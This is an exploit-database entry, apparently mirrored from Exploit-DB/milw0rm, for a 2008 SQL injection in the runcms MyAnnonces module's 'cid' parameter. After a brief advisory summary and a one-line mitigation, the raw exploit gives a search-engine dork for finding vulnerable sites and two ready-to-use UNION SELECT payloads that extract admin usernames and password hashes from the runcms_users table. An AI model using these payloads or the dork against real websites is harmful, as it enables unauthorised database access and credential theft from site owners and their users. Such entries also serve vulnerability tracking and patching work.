header-logo
Suggest Exploit
vendor:
MyAnnonces
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MyAnnonces
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

runcms MyAnnonces SQL Injection(cid)

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'cid' parameter to '/index.php' script. A remote attacker can execute arbitrary SQL commands in application's database and gain access to sensitive information. An example of vulnerable URL is 'XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT]'. An attacker can exploit this vulnerability by sending a specially crafted request with malicious SQL code in 'cid' parameter.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied input to prevent malicious SQL code execution.
Source

Exploit-DB raw data:

###############################################################
#
# runcms MyAnnonces SQL Injection(cid)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAİL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "modules MyAnnonces index php pa view"
#
################################################################
EXAMPLE
XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT]

EXPLOIT :

for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*



################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################

# milw0rm.com [2008-02-19]